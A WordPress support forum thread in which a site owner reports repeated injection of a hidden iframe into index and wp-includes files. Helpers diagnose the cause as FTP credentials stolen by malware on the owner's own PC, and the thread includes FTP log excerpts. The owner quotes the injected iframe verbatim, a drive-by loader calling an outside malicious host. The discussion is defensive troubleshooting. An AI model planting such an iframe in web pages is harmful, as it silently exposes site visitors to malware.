Forums

WordPress › Support » How-To and Troubleshooting

My Wordpress sites keep getting hacked! :( [2.82] (12 posts)

  1. michael-toon
    Member
    Posted 3 months ago #

    Hello,

    I have wordpress installed on 2 seperate servers, they are keep getting hacked with the same hack. Someone is putting in a line of code in files, mainly inedx files. Files infected are:

    index.php
    wp-admin/index.php
    wp-admin/index-extra.php
    wp-content/index.php
    wp-content/plugins/index.php
    wp-content/theme/index.php
    wp-content/theme/theme-name/index.php (of all/any themes)

    The code is:
    <iframe src="http://x8y.ru:8080/ts/in.cgi?pepsi116" width=125 height=125 style="visibility: hidden"></iframe>

    Now, i think this is a wordpress problem because i have it installed on 2 different servers, and its the only thing installed on one server in a few instances. ALL the sites get hacked.

    On server 1 i have WP installed with default theme and no plugins. I have tried deleting all files and re-uploading new files which has not worked.

    Server 2 i have 3 installations running of WP, and nothing else on the server.

    Other security measures i have taken are:
    password protect the wp-admin directory
    changed the wp_ table name to something different (something different on each install)
    uninstall all plugins/themes and have a completly default WP running
    changed the passwords and usernames of the Admin account (using long passwords with upper/lower case letters/numbers/special chars.
    change the MYSQL passwords

    I have had to remove the WP on server 1 because i have other things on that site and it seems to infect them once it gets to WP.

    I have been running WP since 2.7 and always upgrade it, and i have had no problems until now.

    Please help me sort this problem out. I have read another person having this problem but there doesnt seem to be a solution. I am rreally sick of waking up checking my site and having this problem and having to upload the index files each time.

  2. mrmist
    Member
    Posted 3 months ago #

    Check over http://codex.wordpress.org/FAQ_My_site_was_hacked and the sites it links to for help on cleaning up hacks. You will need to change login passwords as well as replacing files, and potentially clean out users from your database.

  3. whooami
    Member
    Posted 3 months ago #

    and how about scanning your local machine(s) for malware.

  4. michael-toon
    Member
    Posted 3 months ago #

    thanks, but i have done all of those things, i have also informed my hosts, i have basically done everything i have read to do plus more.

    I have now removed WP from server 1 completly, so i will see if i get this problem without WP (which i doubt).

    Doesnt it seem strange to you that this has happened on different WP's on seperate servers, exactly the same thing? 1 server only running WP.

  5. whooami
    Member
    Posted 3 months ago #

    Doesnt it seem strange to you..

    no it doesnt. i once cleaned out 5 sites across 3 servers all owned by the same guy.

    he had malware on one of the machines he was using.

    its espcially suspicious when only certain files are edited, ie only files with the string index*

    Humor me - do you have cpanel available, and are you archiving your server logs?

    --

    lastly,

    one server only running wordpress

    is this YOUR server? because I assure you that unless its YOUR server, you have NO idea whats running on it, outside of your own web space.

    Im not suggesting that that's the source of your issue, just that you see a very small picture of whats going on when youre in nearly every shared hosting environment.

  6. mrmist
    Member
    Posted 3 months ago #

    It's not really strange, as crackers and spammers just search the web for sites to exploit automatically. If both sites are at the same version, for example, there may be a hack that works on both. I also expect that lists are kept of where hacks have been used successfully, and those sites will be hit again.

    If you really have done everything in those articles then I'd do what whoami suggests and scan your local computer, in case you have an exploited program.

  7. whooami
    Member
    Posted 3 months ago #

    malware infections, gumblar variants, are VERY easy to see in ftp logs.

    you will see multiple connections editing and replacing files .. within seconds of one another, and .. they all have different IPs.

    those IPS .. point back to other malware infected machines.

    its unmistakable traffic if you know what youre looking for.

    If youre not archiving those logs.. that data wont be available.

  8. michael-toon
    Member
    Posted 3 months ago #

    i have cpanel. i have checked the raw access logs, and cant find antyhing.

    i dont look after the servers the hosting company does. I have asked them to do a scan but its a good company and i have had no problems with them in 7 years so i would imagine they do, but there we go.

    it isnt actaully only those index files, i missed 2 out it does:

    wp-includes/default-widgets.php
    wp-includes/default-filters.php

    Also, someone else has this problem, here:
    http://wordpress.org/support/topic/293832?replies=6

  9. whooami
    Member
    Posted 3 months ago #

    not your raw access logs.

    access logs are web server logs.

    default* is the other common string -- (sorry still not sold)

    and here:

    http://www.vbulletin.com/forum/showthread.php?t=311113

    heres someone with the problem thats using vbulletin.

    You can link - so can I. :)

    heres a drupal site:

    http://drupal.org/node/499756

  10. michael-toon
    Member
    Posted 3 months ago #

    lol ok i take you point :)

    unfortunatly one server does not have the archiving on (it does now :p ) i checked the other and saw that they accessed and modified my files in that, but how did they get access in the first place?

  11. whooami
    Member
    Posted 3 months ago #

    i checked the other and saw that they accessed and modified my files in that ...

    you checked what? your ftp log in cpanel?

    if you dont mind, paste a bit of what you see? 2-3 lines are fine

    if, in fact, youre seeing the activity I described .. well then, it means your ftp password is being compromised.

    In other words, you have malware on one of your machines, and you have not addressed that problem.

    Until you do, your password(s) will continue to be compromised -- no matter how many times you change it.

    http://www.google.com/#hl=en&q=get+rid+of+malware&aq=f&oq=&aqi=&fp=8nV-RSzXL1c

    2nd link: malwarebytes.org

    heres how it works:

    you may or may not have done all your windows updates, etc.. you may be running some adobe products (which have been increasingly vulnerable to these sOrts of attacks).. you might download a peiece of software in a torrent.. you surf a site that is distributing malware ..it could be anything.

    you get the malware.

    it adds you to a botnet.
    it sends off your stored ftp passwords

    other machines, that are already in the botnet, login to all the sites in the stolen ftp password list that was "sent off". they make changes to your files that allow the malware to be distributed using your site.

    while you remain exploited.

    for anyone thats REALLY curious, take a look at port explorer:

    http://diamondcs.com.au/portexplorer/

    its not free for long (the trial is short), but its an excellent tool for helping in diagnosing these sorts of things. Note that connections to unusual IPs on ports that are sually reserved for irc connections (6666, 6667, etc..) are more evidence of malware.

  12. michael-toon
    Member
    Posted 3 months ago #

    here are some lines:

    Tue Jul 28 05:42:34 2009 0 83.82.57.39 7890 /home/blahblah/public_html/blog/wp-includes/default-filters.php a _ o r blahblah ftp 1 * c
Tue Jul 28 05:42:42 2009 1 89.28.61.63 7794 /home/blahblah/public_html/blog/wp-includes/default-filters.php a _ i r blahblah ftp 1 * c
Tue Jul 28 05:42:50 2009 0 212.235.74.52 37651 /home/blahblah/public_html/blog/wp-includes/default-widgets.php a _ o r blahblah ftp 1 * c
Tue Jul 28 05:42:58 2009 1 68.46.148.41 36774 /home/blahblah/public_html/blog/wp-includes/default-widgets.php a _ i r blahblah ftp 1 * c

    I use strong passwords for my ftp accounts, needless to say i have changed them aswell. I have been going through some things on the server removing them, there was some old things in the home directory (outside public_html) on 1 server which i have now removed.

Reply

You must log in to post.

About this Topic

Tags